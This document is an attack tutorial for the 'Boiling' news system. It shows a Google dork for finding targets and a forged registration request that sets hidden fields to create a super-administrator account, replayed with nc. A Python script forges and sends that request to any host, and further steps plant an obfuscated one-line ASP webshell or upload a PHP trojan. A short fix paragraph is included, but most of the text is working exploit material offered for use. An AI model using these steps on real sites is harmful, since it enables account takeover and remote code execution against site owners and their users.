Vulnerability: Boiling News System registration vulnerability
Hazard: super administrator accounts can be registered at will
Finding targets: search Google for the keyword "V0.45 ACCESS Version Finish"
The Boiling news system (hereinafter "Boiling") had a file upload vulnerability long ago, and it has since been fixed. The SQL injection vulnerability has been fixed too, or at best an injection leaves you with a pile of MD5 hashes. Does that mean the system is free of vulnerabilities? Of course not. Today we look at another, new vulnerability in this news system: the registration vulnerability.
1. Finding targets
Many websites run this system. Entering "V0.45 ACCESS Version Finish" in Google turns up a long list of sites that use it.
Since this is a registration vulnerability, the first thing to determine is whether a site we have found has user registration enabled. Most sites that use this system do not need the registration function, but have not disabled it either. Simply open http://target/admin/adduser.asp: if registration has not been disabled, the registration page appears; if it has, pick another site (or see my next article).
2. Capture and modify the packet
Once we have confirmed that registration is enabled, we register. Fill in the form, but do not click Confirm yet: start WsockExpert to monitor the browser, then submit and look at the request captured for the page.
The packet shows every parameter we submit to the server. Besides the visible form fields there are several hidden default parameters:
purview=1&oskey=selfreg&level=1&cmdOk=+%C8%B7+%B6%A8+
Sharp-eyed readers will already have spotted the interesting ones. oskey identifies the user's role: oskey=super marks a system administrator, i.e. the super administrator, and purview is the permission value. Because these parameters are submitted by the client during registration, we can change them on our own machine and submit the modified packet, which achieves the goal of registering a super administrator.
Save the whole captured request from Figure 2 to a text file, say 4.txt, and edit it: set username to the name you want to register, purview to 99999 and oskey to super. Update Content-Length to the length of the edited body; the server reads exactly that many bytes, so a stale value cuts off the end of the body. Then put nc.exe and 4.txt in the root of drive C.
3. Register a super administrator user
Open a command prompt and submit the modified packet with nc:
nc www.xxxyy.com 80 < 4.txt
(www.xxxyy.com is the target domain name or IP address the data is submitted to.)
The server answers with a page; if registration succeeded, the response contains the registration-success message, which means our user has been registered. Log in to the backend with the username and password from the submitted packet: if you can see all news sections, the super administrator account has been registered successfully.
4. Fixing the vulnerability
This is only a small vulnerability. The fix: when saving the registration, do not read the administrator values (purview, oskey) from the form; write fixed server-side values instead.
1. Register an administrator account by submitting with nc.
Capture the request while registering on the user registration page /admin/adduser.asp:
POST /admin/saveuser.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxx.net/admin/adduser.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xxxx.net
Content-Length: 288
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDAADCRSQQ=PCJDJCPBKPKCEBKDHPJPIANI; sdlyyzecho=lao=True; sdlyyz=lao=2

username=123&passwd=123456&passwd2=123456&question=1%2B1%3D%3F&answer=3333&fullname=%BA%A3%B5%C1&depid=17&sex=%B1%A3%C3%DC&birthyear=1950&birthmonth=1&birthday=1&tel=1333333333&email=33333@tom.com&photo=&content=&purview=99999&oskey=super&level=1&jingyong=0&cmdOk=+%C8%B7+%B6%A8+
In the request body, set purview=99999 and oskey=super (they are form parameters, not cookie values), then submit the request with nc to register as an administrator.
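The packet-forging procedure of sections 2 and 3, the captured request above and the fix of section 4, as an added example (not code from the original write-up or from the Boiling system): it takes a captured POST to /admin/saveuser.asp, overwrites the hidden purview and oskey fields (the same two values the edited HTML form in Step 1 below changes), recomputes Content-Length, and can replay the raw bytes over a socket the way "nc target 80 < 4.txt" does. The embedded capture is constructed: the host, session cookie and personal-data fields are placeholders. The two small save_user_* functions are an assumed model of the vulnerable and fixed server logic, since the page shows no ASP source.

```python
"""Forge the Boiling news system registration POST (added example).

Reads a captured /admin/saveuser.asp request, overwrites the hidden
purview/oskey fields, recomputes Content-Length and can replay the raw
bytes the way `nc target 80 < 4.txt` does. Standard library only.
"""
import socket
import sys

# Constructed capture modelled on the write-up's; host, cookie and the
# personal-data fields are placeholders, not a real capture.
CAPTURED = (
    "POST /admin/saveuser.asp HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Referer: http://www.example.com/admin/adduser.asp\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 1\r\n"  # stale on purpose; forge_registration fixes it
    "Connection: close\r\n"
    "Cookie: ASPSESSIONIDAAAAAAAA=PLACEHOLDERSESSIONVALUE00\r\n"
    "\r\n"
    "username=123&passwd=123456&passwd2=123456&question=1%2B1%3D%3F"
    "&answer=3333&fullname=test&depid=17&sex=m&birthyear=1950"
    "&birthmonth=1&birthday=1&tel=1333333333&email=test%40example.com"
    "&photo=&content=&purview=1&oskey=selfreg&level=1&jingyong=0"
    "&cmdOk=+%C8%B7+%B6%A8+"
)

# The hidden fields the server trusts; a self-registering user can set them.
SUPER_ADMIN = {"purview": "99999", "oskey": "super"}


def parse_form(body):
    """Split a form body into (name, value) pairs, keeping values
    percent-encoded so GBK escapes like %C8%B7 round-trip byte for byte."""
    pairs = []
    for field in body.split("&"):
        name, _, value = field.partition("=")
        pairs.append((name, value))
    return pairs


def encode_form(pairs):
    return "&".join(f"{name}={value}" for name, value in pairs)


def forge_registration(raw, overrides):
    """Return the request as bytes with the hidden fields overridden and
    Content-Length equal to the new body length (a stale value makes the
    server cut the body short or wait for bytes that never come)."""
    head, _, body = raw.partition("\r\n\r\n")
    pairs = [(n, overrides.get(n, v)) for n, v in parse_form(body)]
    present = {n for n, _ in pairs}
    pairs += [(n, v) for n, v in overrides.items() if n not in present]
    new_body = encode_form(pairs)
    lines = []
    for line in head.split("\r\n"):
        if line.lower().startswith("content-length:"):
            line = f"Content-Length: {len(new_body.encode('latin-1'))}"
        lines.append(line)
    return ("\r\n".join(lines) + "\r\n\r\n" + new_body).encode("latin-1")


def save_user_vulnerable(body):
    """Assumed model of the flawed saveuser.asp: the stored role and
    permission level are whatever the submitted form said."""
    fields = dict(parse_form(body))
    return {"username": fields["username"],
            "oskey": fields["oskey"], "purview": fields["purview"]}


def save_user_fixed(body):
    """The fix from section 4: self-registration stores fixed values and
    ignores the form's purview/oskey entirely."""
    fields = dict(parse_form(body))
    return {"username": fields["username"], "oskey": "selfreg", "purview": "1"}


def replay(host, port, request):
    """Send the raw request like nc does and return the whole reply."""
    with socket.create_connection((host, port), timeout=10) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


if __name__ == "__main__":
    forged = forge_registration(CAPTURED, SUPER_ADMIN)
    sys.stdout.write(forged.decode("latin-1"))  # the equivalent of 4.txt
    if len(sys.argv) > 1:  # python forge.py target.example.com
        print(replay(sys.argv[1], 80, forged).decode("latin-1", "replace"))
```

Run without arguments it prints the forged request, the equivalent of the edited 4.txt; with a hostname it replays it like nc. Values are kept percent-encoded throughout so the GBK escapes in fields such as cmdOk are not mangled by a decode/re-encode round trip, and the Content-Length rewrite is the one step the hand-edited 4.txt method tends to skip.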
2. On a site where registration is open, post an article, insert an image using "save remote image", and insert a one-sentence trojan. Because the Boiling system filters some special characters, the trojan has to be deformed. The deformed trojan code is:
<%
Response.Write "<% execute request("""
Response.Write "33"")"
Response.Write "%" & ">"
%>
When executed, these three Response.Write calls emit the literal text <% execute request("33") %>, so the submitted text never contains the complete one-liner the filter is looking for.
3. Insert <% execute request("33") %>, call admin/createasp.asp, then call lastnewsxp.asp.
The procedure is as follows:
Step 1. Register a user and escalate privileges
Check whether http://target/admin/adduser.asp exists. If it does, view the page source, save it as an .htm file and edit it:
[1] change the form attribute action="saveuser.asp" to action="http://target/admin/saveuser.asp";
[2] change the hidden inputs <input name="purview" type="hidden" value=""> and <input name="oskey" type="hidden" value=""> so that purview has the value 99999 and oskey has the value super.
Then open the local file and submit the registration. Capturing the registration request and submitting it with nc has exactly the same effect. Either way you are registered as a super administrator.
Step 2. Get a webshell from the backend
Method 1:
In article management, publish an article with the trojan written in the title. Open http://target/admin/createasp.asp to run the page-generation update (it regenerates the home page as asp). Then connect a trojan client to http://target/lastnewsxp.asp and upload a small webshell.
Method 2 (for sites that support php):
Add php to the allowed upload types, upload a php trojan, and view the HTML source to get its address.
Method 3 (I did not succeed with this one following the online tutorial):
On a site where registration is open, post an article, insert an image using "save remote image", and insert the one-sentence trojan. Because the Boiling system filters some special characters, the trojan has to be deformed, in the same way as the Response.Write version shown under item 2 above.